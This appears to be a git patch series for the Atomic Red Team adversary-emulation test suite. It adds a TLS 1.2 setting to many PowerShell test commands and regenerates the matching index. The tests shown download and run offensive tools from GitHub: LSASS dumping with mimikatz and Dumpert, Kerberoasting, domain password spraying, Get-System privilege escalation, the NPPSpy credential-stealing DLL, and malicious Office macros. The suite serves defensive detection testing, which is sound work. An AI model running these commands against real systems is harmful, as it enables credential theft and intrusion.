zl$4cBMVNX_(svGTbV*mPAl?5l9sA<1zya1i$bk9Mw8|oRmTZ^yld+K_foCxTr8e5I zq3%5nn*tR~8=pkSM@nzT+NrXW=Ohxx4U13;|&$a+&u=ssMr6X0XGD zOWwLNORUf?8Hzce#J*=+^XQ`N@>jca*og8A)L98gK1ebrMav?PPy#Odgg-)xLv&TC zXCdUJCPV7meIW0BjNX|@*6x(|1x3!FAyDfOhU933;|;kvq#QTNoR7Ge8~D~>PulTQ z^0UG7A3)R|dF_WI3y;uqkZ0@PqMyS84?Bk=$~{(aq9_|SZ^tfBUDjuWCBKSsia%GD zToxjeQbUck5NO>+9L#5XAm4ycNZfZ>)oSI)2XLO zqaOV?Zm>%&S7k=qxx8OEgzy000T&zPe8G{8HIT#z&NTN5+dE6CThnH_8upCau4_;haN?}oX5-VRRmK_&z2SD27PE}-s7px55;0ebN) zGF$YDP?Y}Gv#Oy6hQ0)3NlQ%Rmy7%?O8#9;>>5x!3rWIuc|TYYbr&THM{Ax9!B|Sj zaSeWc{&rzf_A(grB+Y6u7iaDkIz@n95YQrQSXv_P#-O0lo?UOLjUXHKjvEW{f)1vx zra{(4q}-yGgt+l0-=|sgSRR;MRuECG#~(10ctwzr#|+<^aPvE+D7xUN z)0fT${jIsljObvu9eJ|Q2QL_8wC>cpm1RF9}O}E>tE<8Ab_X@U1=~AcE|A!} zuL>FH*a6#GDpvZrsb@TTxkH{s(B+LkA+x*lR6Tu@okd!jE=?LCPUsvINojwy&`$Mu zi!i&rf)ZLNxKz;HmjS7L@a%c5;cMU-#3X#WF+vW)KE7Q*Eq=I#5TXFtcyT4K|0bSQ zTy8tqGGUvf8jf!57fLpZ=uyZJv# zXO&#JEVx-tNMqL80v7H=R|QkV)n*g+z1i+KVJownEfsKbxSVaF0b$?Kmj?yts+ZQ@ z+@eSDC2^TG2TVFCX=PK{GP|0MfxG6O=bwZjADL-u3JJ1d=0fQ^k%@YYcnF4)2(x@1YbZslOV5s=3Y}k4yZ7aP`|A)gh*&Imn|~RtD^|3h(BG3ZJM52 z@;Z**_4arcm0Tm_(Z7wG?pFxk`;83){n;A#KG|b&P1g?xCIO-Gidl#<#(!H}-$yBv z5X;2LALa*ig{X9rn$mCEJk~!3+%+?OtN7a-7p67aaeQhR;KW6E=JJ-3lf$)jJ*W^z_!#8H!heqDb4x8$s5 zE9>Y`cDR!P4`|8_*kj_cnucgc{KjL;`M|<7Bp1NLR{i&*EjnzL)GZY+R#+|U%3M^V zyo4qo*#8>E0Ln|SNeeONeweU+5M%rSg?ljY#Q@T9i_r042 zYbC&*$9aNNFJ1nb+MB4&q&GfT`3@Xx?jzCWVGXah;3=T8^4Fx~2}bTj0A-Hfp5^6> z$y!ED==1zd7Zcz6&Mo-v+Dp;z+mo(2E9D0Cd)+%yA{$FwA_OZz;yMdlA{i?+;eU8u z|5{44fAIX@gMpB^$?}Ep|7W!P*T4`tk(!O1@IMVH=|8sEf3^Rl4AR73s5pt;tmuUQ ze--dwJA9hNQ&tkf|D@D^oHM-tYX3=xUlRk62@(NT^#6^^M0qwGi0edCHj4i`SYiSj LJ1jNJ|GfKuM_(Yx From 42799b033dcab848999d935170bf0b711e7ff938 Mon Sep 17 00:00:00 2001 From: SecurityShrimp Date: Wed, 16 Jun 2021 13:41:04 -0500 Subject: [PATCH 48/84] added TLS/SSL v1.2 enabling commands to any atomic test utilizing IWR (#1519) * Update T1204.002.md Added lines to each test using IWR for invoke-webrequest to set the acceptable TLS versions for the commands to complete successfully by prepending the tests with ```[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12``` * Update T1555.yaml added line to set ssl/tls version * Update T1134.001.yaml updated IWR lines to allow ssl/tls version 1.2 * Update T1069.002.yaml added lines to every IWR instance to set ssl/tls version to 1.2 * Update T1558.003.yaml added line to allow TLS/SSL 1.2 * Update T1033.yaml added command to enable SSL/TLS v1.2 * Update T1055.012.yaml added command to enable TLS/SSL v1.2 * Update T1115.yaml Added command to enable SSL/TLS v1.2 * Update T1070.001.yaml added command enabling SSL/TLS v 1.2 * Update T1564.yaml added commands to enable SSL/TLS v 1.2 * Update T1566.001.yaml added command to enable SSL/TLS V1.2 * Update T1135.yaml added command to enable SSL/TLS v1.2 * Update T1055.yaml added commands to enable TLS/SSL v 1.2 * Update T1110.003.yaml added command to enable TLS/SSL v1.2 * Update T1003.yaml Added command to enable TLS/SSL v1.2 * Update T1053.005.yaml added command to enable TLS/SSL v1.2 * Update T1003.001.yaml added commands to enable TLS/SSL v1.2 for any command using invoke-webrequest * Update T1069.002.yaml syntax correction * Update T1134.001.yaml syntax correction Co-authored-by: Carrie Roberts --- atomics/T1003.001/T1003.001.yaml | 6 ++++++ atomics/T1003/T1003.yaml | 1 + atomics/T1033/T1033.yaml | 1 + atomics/T1053.005/T1053.005.yaml | 1 + atomics/T1055.012/T1055.012.yaml | 1 + atomics/T1055/T1055.yaml | 3 +++ atomics/T1069.002/T1069.002.yaml | 7 ++++++- atomics/T1070.001/T1070.001.yaml | 3 ++- atomics/T1110.003/T1110.003.yaml | 1 + atomics/T1115/T1115.yaml | 1 + atomics/T1134.001/T1134.001.yaml | 8 ++++++-- atomics/T1135/T1135.yaml | 1 + atomics/T1555/T1555.yaml | 1 + atomics/T1558.003/T1558.003.yaml | 1 + atomics/T1564/T1564.yaml | 3 ++- atomics/T1566.001/T1566.001.yaml | 3 ++- 16 files changed, 36 insertions(+), 6 deletions(-) diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index eb902b08..95a7a2f6 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml @@ -38,6 +38,7 @@ atomic_tests: if (Test-Path #{wce_exe}) {exit 0} else {exit 1} get_prereq_command: | $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip" + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing) if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){ Expand-Archive $zippath $parentpath\wce -Force @@ -78,6 +79,7 @@ atomic_tests: prereq_command: | if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null @@ -129,6 +131,7 @@ atomic_tests: prereq_command: | if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1} get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe} executor: @@ -183,6 +186,7 @@ atomic_tests: prereq_command: | if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest' $request = [System.Net.WebRequest]::Create($url) $response = $request.GetResponse() @@ -256,6 +260,7 @@ atomic_tests: - windows executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump cleanup_command: | Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore @@ -382,6 +387,7 @@ atomic_tests: prereq_command: | if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1} get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} executor: command: | diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml index 911859c6..d622c125 100644 --- a/atomics/T1003/T1003.yaml +++ b/atomics/T1003/T1003.yaml @@ -61,6 +61,7 @@ atomic_tests: - description: NPPSpy.dll must be available in local temp directory prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1} get_prereq_command: |- + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll" executor: command: |- diff --git a/atomics/T1033/T1033.yaml b/atomics/T1033/T1033.yaml index 98369491..2628605d 100644 --- a/atomics/T1033/T1033.yaml +++ b/atomics/T1033/T1033.yaml @@ -48,5 +48,6 @@ atomic_tests: - windows executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose name: powershell diff --git a/atomics/T1053.005/T1053.005.yaml b/atomics/T1053.005/T1053.005.yaml index a7a51aef..204e3985 100644 --- a/atomics/T1053.005/T1053.005.yaml +++ b/atomics/T1053.005/T1053.005.yaml @@ -127,6 +127,7 @@ atomic_tests: Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler" name: powershell diff --git a/atomics/T1055.012/T1055.012.yaml b/atomics/T1055.012/T1055.012.yaml index a13bed68..f73de2eb 100644 --- a/atomics/T1055.012/T1055.012.yaml +++ b/atomics/T1055.012/T1055.012.yaml @@ -59,6 +59,7 @@ atomic_tests: Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit" name: powershell diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml index a79b95ec..83d13c9b 100644 --- a/atomics/T1055/T1055.yaml +++ b/atomics/T1055/T1055.yaml @@ -26,6 +26,7 @@ atomic_tests: Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" name: powershell @@ -60,6 +61,7 @@ atomic_tests: if (Test-Path $mimikatz_path) {exit 0} else {exit 1} get_prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null @@ -69,6 +71,7 @@ atomic_tests: prereq_command: | if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null diff --git a/atomics/T1069.002/T1069.002.yaml b/atomics/T1069.002/T1069.002.yaml index 84f64dda..193d79de 100644 --- a/atomics/T1069.002/T1069.002.yaml +++ b/atomics/T1069.002/T1069.002.yaml @@ -53,6 +53,7 @@ atomic_tests: - windows executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose name: powershell - name: Find local admins on all machines in domain (PowerView) @@ -63,6 +64,7 @@ atomic_tests: - windows executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose name: powershell - name: Find Local Admins via Group Policy (PowerView) @@ -77,7 +79,9 @@ atomic_tests: type: Path default: $env:COMPUTERNAME executor: - command: "IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose" + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose" name: powershell - name: Enumerate Users Not Requiring Pre Auth (ASRepRoast) auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b @@ -123,6 +127,7 @@ atomic_tests: prereq_command: | if (Test-Path #{adfind_path}) {exit 0} else {exit 1} get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} executor: command: | diff --git a/atomics/T1070.001/T1070.001.yaml b/atomics/T1070.001/T1070.001.yaml index 1a95ff41..019d9ef3 100644 --- a/atomics/T1070.001/T1070.001.yaml +++ b/atomics/T1070.001/T1070.001.yaml @@ -54,7 +54,8 @@ atomic_tests: Write-Host "You will need to install Microsoft Word manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs" name: powershell - elevation_required: true \ No newline at end of file + elevation_required: true diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml index afa612f3..84d9e7f0 100644 --- a/atomics/T1110.003/T1110.003.yaml +++ b/atomics/T1110.003/T1110.003.yaml @@ -53,6 +53,7 @@ atomic_tests: name: powershell elevation_required: false command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1' -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force - name: Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos) auto_generated_guid: f14d956a-5b6e-4a93-847f-0c415142f07d diff --git a/atomics/T1115/T1115.yaml b/atomics/T1115/T1115.yaml index d31d6b2a..6ef34667 100644 --- a/atomics/T1115/T1115.yaml +++ b/atomics/T1115/T1115.yaml @@ -62,6 +62,7 @@ atomic_tests: Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA" IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard" diff --git a/atomics/T1134.001/T1134.001.yaml b/atomics/T1134.001/T1134.001.yaml index 13b5dba6..2d0248d3 100644 --- a/atomics/T1134.001/T1134.001.yaml +++ b/atomics/T1134.001/T1134.001.yaml @@ -11,7 +11,9 @@ atomic_tests: supported_platforms: - windows executor: - command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose name: powershell elevation_required: true - name: '`SeDebugPrivilege` token duplication' @@ -22,6 +24,8 @@ atomic_tests: supported_platforms: - windows executor: - command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose name: powershell elevation_required: true diff --git a/atomics/T1135/T1135.yaml b/atomics/T1135/T1135.yaml index d7558832..7567f6f3 100644 --- a/atomics/T1135/T1135.yaml +++ b/atomics/T1135/T1135.yaml @@ -90,6 +90,7 @@ atomic_tests: - windows executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose name: powershell diff --git a/atomics/T1555/T1555.yaml b/atomics/T1555/T1555.yaml index e5e80e64..cb51c49b 100644 --- a/atomics/T1555/T1555.yaml +++ b/atomics/T1555/T1555.yaml @@ -23,6 +23,7 @@ atomic_tests: Write-Host "You will need to install Microsoft Word manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract" cleanup_command: | diff --git a/atomics/T1558.003/T1558.003.yaml b/atomics/T1558.003/T1558.003.yaml index 1aab927f..e941e8ec 100644 --- a/atomics/T1558.003/T1558.003.yaml +++ b/atomics/T1558.003/T1558.003.yaml @@ -14,6 +14,7 @@ atomic_tests: - windows executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing) Invoke-Kerberoast | fl name: powershell diff --git a/atomics/T1564/T1564.yaml b/atomics/T1564/T1564.yaml index 79e88e8f..135e5897 100644 --- a/atomics/T1564/T1564.yaml +++ b/atomics/T1564/T1564.yaml @@ -33,6 +33,7 @@ atomic_tests: command: | $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt") $macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin" + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap cleanup_command: | @@ -57,4 +58,4 @@ atomic_tests: name: powershell elevation_required: true command: New-LocalUser -Name "Administrator " -NoPassword - cleanup_command: Remove-LocalUser -Name "Administrator " 2>&1 | out-null \ No newline at end of file + cleanup_command: Remove-LocalUser -Name "Administrator " 2>&1 | out-null diff --git a/atomics/T1566.001/T1566.001.yaml b/atomics/T1566.001/T1566.001.yaml index 52fb8b73..1936e8b1 100644 --- a/atomics/T1566.001/T1566.001.yaml +++ b/atomics/T1566.001/T1566.001.yaml @@ -55,9 +55,10 @@ atomic_tests: Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: | Remove-Item #{jse_path} -ErrorAction Ignore - name: powershell \ No newline at end of file + name: powershell From 88ad3fd322f0c9d7d000709472b2fd031d526366 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 16 Jun 2021 18:41:22 +0000 Subject: [PATCH 49/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 119 +++++++++++++++++++-------------- atomics/T1003.001/T1003.001.md | 6 ++ atomics/T1003/T1003.md | 1 + atomics/T1033/T1033.md | 1 + atomics/T1053.005/T1053.005.md | 1 + atomics/T1055.012/T1055.012.md | 1 + atomics/T1055/T1055.md | 3 + atomics/T1069.002/T1069.002.md | 6 +- atomics/T1070.001/T1070.001.md | 1 + atomics/T1110.003/T1110.003.md | 1 + atomics/T1115/T1115.md | 1 + atomics/T1134.001/T1134.001.md | 2 + atomics/T1135/T1135.md | 1 + atomics/T1555/T1555.md | 1 + atomics/T1558.003/T1558.003.md | 1 + atomics/T1564/T1564.md | 1 + atomics/T1566.001/T1566.001.md | 1 + 17 files changed, 96 insertions(+), 52 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index e4991964..55705447 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -1113,6 +1113,7 @@ credential-access: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract" cleanup_command: 'Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction @@ -2338,6 +2339,7 @@ credential-access: - windows executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing) Invoke-Kerberoast | fl name: powershell @@ -2851,6 +2853,7 @@ credential-access: ' get_prereq_command: | $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip" + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing) if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){ Expand-Archive $zippath $parentpath\wce -Force @@ -2892,6 +2895,7 @@ credential-access: ' get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null @@ -2946,6 +2950,7 @@ credential-access: ' get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe} executor: @@ -3000,6 +3005,7 @@ credential-access: ' get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest' $request = [System.Net.WebRequest]::Create($url) $response = $request.GetResponse() @@ -3083,10 +3089,9 @@ credential-access: supported_platforms: - windows executor: - command: 'IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1''); - get-process lsass | Out-Minidump - -' + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore ' @@ -3221,10 +3226,9 @@ credential-access: prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1} ' - get_prereq_command: 'Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" - -OutFile #{xordump_exe} - -' + get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} executor: command: "#{xordump_exe} -out #{output_file} -x 0x41\n" cleanup_command: 'Remove-Item ${output_file} -ErrorAction Ignore @@ -4035,8 +4039,9 @@ credential-access: - description: NPPSpy.dll must be available in local temp directory prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1} - get_prereq_command: Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll - -OutFile "$env:Temp\NPPSPY.dll" + get_prereq_command: |- + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll" executor: command: |- Copy-Item "$env:Temp\NPPSPY.dll" -Destination "C:\Windows\System32" @@ -4611,11 +4616,9 @@ credential-access: executor: name: powershell elevation_required: false - command: 'IEX (IWR ''https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1'' - -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain - #{domain} -Force - -' + command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1' -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force - name: Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos) auto_generated_guid: f14d956a-5b6e-4a93-847f-0c415142f07d @@ -6925,6 +6928,7 @@ collection: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA" IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard" @@ -15223,7 +15227,8 @@ privilege-escalation: ' executor: - command: "IEX (iwr 